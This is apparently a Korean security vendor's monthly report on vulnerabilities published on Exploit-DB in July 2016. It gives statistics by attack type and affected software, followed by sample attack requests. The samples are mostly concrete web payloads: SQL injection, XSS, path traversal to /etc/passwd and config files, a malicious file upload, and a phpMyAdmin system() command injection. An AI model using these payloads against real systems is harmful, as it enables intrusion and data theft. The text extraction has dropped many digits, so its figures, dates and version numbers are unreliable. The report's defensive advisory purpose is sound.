EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다. 해당취약점들은일반적으로발생하는 Cross Site Scripting 취약점이아닌특정프로그램상에서만발생하는취약점들이대부분이었습니다. 주요소프트웨어별취약점발생현황을보면, 에서가장많은취약점이발견되었습니다. (* 에서발견된취약점들은 자체의문제가아닌특정 Plug-in 을사용할때발생할수있는취약점이대부분입니다.) 해당취약점들은 Parameter 의 Value 에삽입되는형식과더불어특정 header 를노리는취약점들이었습니다. 취약점이발견된프로그램및 Plug- in 을사용하는관리자는업데이트사항확인및빠른업데이트가요구되어집니다.. 취약점별보고개수 취약점 보고개수 Command Injection Code Injection File Upload LFI 3 SQL Injection 9 XSS 5 총합계 30 6 4 0 8 6 4 0 Command Injection 취약점별보고개수 Code Injection File Upload LFI SQL Injection XSS 3 9 5. 위험도별분류위험도 보고개수 백분율 상 6.67% 중 8 93.33% 합계 30 00.00% 위험도별분류 상 중 8 3. 공격난이도별현황공격난이도 보고개수 백분율 상 6.67% 중 7 3.33% 하 70.00% 총합계 30 00.00% 공격난이도별현황 7 상 중 하 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 총합계 30 주요소프트웨어별취약점발생현황 5 5 5 3 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-04 40058 SQL Injection 하중 0.5 - index.php SQL Injection 취약점 /ecardmaxdemo/admin/index.php?step=admin_show_key word&what=&row_number=0%0order%0by%0-- &search_year=06&page= 0.5 06-07-06 4006 SQL Injection 중중 Billing /admin/aomanage.php?search=&cat=status%0union System ().9.6 - %0select%0,,3,version%8%9,5,current_user,7,8, aomanage.php SQL Injection 취 9,0,,,3,4,5,6,7,8,9,0,--&list=3&so=status' 약점 ().9. 06-07-04 4005 SQL Injection 상상 POST / HTTP/. Chrome/6.0.9.75 Safari/535.7 Photostore 4.7.5 - /photostore/gallery/objects/4/ page/ SQL Injection 취약점 postgalleryform=&gallerysortby=media_id&gallerysortty pe=asc,(select 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore 4.7.5 06-07-04 40058 XSS 하중 0.5 - index.php XSS 취약점 /ecardmaxdemo/admin/index.php?step=admin_member_d isplay&search_field=all&keyword=%3cscript%3ealert()% 3C%Fscript%3E&cmd_button=Search+User 0.5 06-07-04 4005 XSS 하중 Photostore 4.7.5 - workbox.php XSS 취약점 /photostore/workbox.php?mode=addtolightbox&mediaid = ><script>alert(/xss/)</script> Photostore 4.7.5 06-07-04 4005 XSS 하중 Photostore 4.7.5 - mgr.login.php XSS 취약점 /photostore/manager/mgr.login.php?username=demo&pa ssword='><script>alert("xss")</script><input type='hidden Photostore 4.7.5 06-07-06 4006 SQL Injection 중중 Billing System ().9.6 - hostingarchiveadmin.php SQL Injection 취약점 # /admin/hostingarchiveadmin.php?search=&cat=status UNION select --&list=&so=status' ().9.

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-06 40063 File Upload 하중 PaKnPost Pro.4 - select_.cgi File Upload 취약점 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream PaKnPost PaKnPost Pro.4 -----------------------------7dd009908f-- 06-07-06 4006 XSS 중중 Billing System ().9.6 - cmanage.php XSS 취약점 POST /admin/cmanage.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9%3c%f script%3e 06-07-06 4006 XSS 중중 Billing System ().9.6 - helpdesk.php XSS 취약점 POST /admin/helpdesk.php HTTP/. Chrome/6.0.9.75 Safari/535.7 ().9. hd_name="><script>alert()</script> 06-07-06 4006 XSS 중중 Billing System ().9.6 - omanage.php XSS 취약점 /omanage.php?search=%%3e%3cscript%3ealert% 83%9%3C/script%3E&cat=status%%3E%3Cscript% 3Ealert%84%9%3C/script%3E&list=4%%3E%3Csc ript%3ealert%8%9%3c/script%3e&so=status%% 3E%3Cscript%3Ealert%8%9%3C/script%3E ().9. 06-07-06 40065 XSS 하중 POST /serverserver-settings.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. - 4.0. - serverserver-settings.jsp XSS 취 약점 3.0. < 4.0. domain=%%f%3e%3cscript%3ealert%8%7xss %7%9%3C%Fscript%3E&remotePort=569&serverA llowed=add+server 06-07-06 40065 XSS 하중 3.0. - 4.0. - advance-user-search.jsp XSS 취약점 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria=admi n%/%3e%3cscript%3ealert%8%7xss%7%9% 3C/script%3E&search=Search 3.0. < 4.0. 06-07-06 40065 XSS 하중 POST /muc-service-edit-form.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. - 4.0. - mucservice-edit-form.jsp XSS 취약점 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f%3e% 3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-06 40065 XSS 하중 3.0. - 4.0. - searchprops-edit-form.jsp XSS 취약점 POST /plugins/search/search-props-edit-form.jsp HTTP/. Chrome/6.0.9.75 Safari/535.7 3.0. < 4.0. searchenabled=true&searchname=%/%3e%3cscript% 3Ealert('XSS')%3C/script%3E&groupOnly=false 06-07-06 40065 XSS 하중 3.0. - 4.0. - groupsummary.jsp XSS 취약점 /groupsummary.jsp?search=test%+onmouseover%3dalert% 8%7XSS%7%9+x%3D% 3.0. < 4.0. 06-07-04 40055 XSS 하중 Real3D FlipBook Plugin - flipbooks.php XSS 취약점 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Chrome/6.0.9.75 Safari/535.7 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</script> 06-07-08 40078 SQL Injection 상중 /programs.php?id=999999.9%7%0union%0all%0s Streamo Online Radio And TV elect%0concat%80x7e%c0x7%cunhex%8hex% Streaming CMS - programs.php 8cast%8database%8%9%0as%0char%9%9 SQL Injection 취약점 %9%C0x7%C0x7e%9%C0x33033534383030 3536%0and%0%7x%7%3D%7x Streamo Streamo Online Radio And TV Streaming CM 06-07-08 40076 LFI 하중 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - Chrome/6.0.9.75 Safari/535.7 /admin/ajax_cms/get_template_ content/ LFI 취약점 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/. 06-07- 4008 XSS 하 중 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin.3.6. 06-07- 40080 LFI 하중 Tiki Wiki CMS 5.0 - flv_stream.php LFI 취약점 /player/flv/flv_stream.php?file=../../../db/local.php&positio n=0 Tiki Wiki Tiki Wiki CMS 5.0

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07- 40084 Code Injection 하중 IPS Community Suite 4...3 - in /index.php?app=core&module=system&controller= IPS Community content&do=find&content_class=cms\fields{}phpinfo();/* IPS Community Suite 4...3 06-07- 40083 XSS 하 중 POST /wp-login.php HTTP/. Chrome/6.0.9.75 Safari/535.7 Activity Log Plugin.3 X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f9.68.8. 35%Fwp-admin%F&testcookie= 06-07-4 40 SQL Injection 하중 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 취약점 /index.php?option=com_guru&view=gurupcategs&layout= view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component 06-07-0 4037 SQL Injection 중 중 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/6.0.9.75 Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_not=&as c_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_playlist& boxchecked=0&filter_order_playlist=&filter_order_dir_playli st= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="to_field" 06-07-0 409 XSS 하중 Django CMS 3.3.0 - /en/admin/djangocms_snippet/s id nippet// XSS 취약점 -----------------------------7dd009908f Content-Disposition: form-data; name="name" Django Django CMS 3.3.0 test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> -----------------------------7dd009908f--

EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06-07-5 4050 SQL Injection 중중 CodoForum 3.. - index.php SQL Injection 취약점 /forum/index.php?u=/user/profile/%0and%0(select %0*(IF((SELECT%0*%0FROM%0(SELECT%0CO NCAT((MID((IFNULL(CAST(CURRENT_USER()%0AS%0C HAR),0x0)),,45))))s),%084467440737095560,%0 84467440737095560))) CodoForum CodoForum 3.. 06-07-6 4063 LFI 하중 PHP File Vault 0.9 - /htdocs/fileinfo.php LFI 취약점 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f.. %Fetc%Fpasswd PHP File Vault PHP File Vault 0.9 06-07-9 4074 SQL Injection 하중 Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/6.0.9.75 Safari/535.7 Ultimate Product Catalog 3.9.8 id=+or+sleep(0)+--+ 06-07-9 4085 ommand Injectio 하 상 POST /tbl_find_replace.php HTTP/. Chrome/6.0.9.75 Safari/535.7 PhpMyAdmin 4.6. - tbl_find_repl PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취